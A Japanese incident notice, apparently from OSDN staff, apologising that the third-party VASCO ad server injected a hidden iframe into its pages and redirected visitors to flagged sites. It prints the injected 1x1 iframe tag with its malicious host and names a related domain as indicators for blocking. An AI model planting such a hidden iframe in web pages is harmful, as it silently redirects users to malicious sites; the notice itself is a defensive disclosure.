ADサーバー担当者 曰く、
今回は大変ご迷惑をおかけしまして申し訳ありませんでした。
OSDNのサイトでは、広告バナーの配信のためのADサーバーとして、 MicroAD社のVASCOを
使っておりましたが、本来掲出されるはずの広告タグの前に不明なiframeタグ差し込まれるという
事態が発生し、その中身によって不明なサイトに誘導されるということが起きてしまいました。
原因がVASCO ADサーバーによるものだと特定でき、OSDN管理のADサーバーに
切り替えたのは24日23:30です。その後、キャッシュなどに残っていないか確認作業を進め、
25日0:29にOSDN全サイトで問題ないことを確認いたしました。
具体的な現象としては、vsc.send.microad.jpのJavaScriptから掲出されるタグにおいて、
<iframe width="1" height="1" src="http://xxxx.ipq.co/statsm?ref=jp"></iframe>
xxxxはversus
のタグが差し込まれ、ここからセキュリティ上警告を受けるサイトに誘導されるというものです。
現在も引き続き原因・詳細を調査中ではありますが、状況説明ならびに対処が終わった旨を
ご報告する次第です。
なお、問題が発生したADサーバーサービスについては、特段の状況の変化がない限り、
OSDNでは今後利用することはありません。
改めまして大変ご迷惑をおかけしましたことをお詫びいたします。
追記・修正:2:12)
Googleのアップデートで「.redmancerg.net」を検索のつぶやきなどでも確認できるように、
影響の範囲はVASCOを採用している各サイトの広範囲に及んでいるようです。
gigazine.net、 impress.co.jpほか、7netshopping.jp、mainichi.jpなど未対処と思われるサイトも
あるので注意してください。
現在(2:12時点)は差し込みはなくなったようですが、時限式の可能性もあります。
初出時、挿入されたiframeのsrc部分をブランクとしましたが、明記に変更しました。
こちらをブロックしておいていただければひとまずの対処になるものと思われます。
ttp://slashdot.jp/slash/article.pl?sid=10/09/24/1641224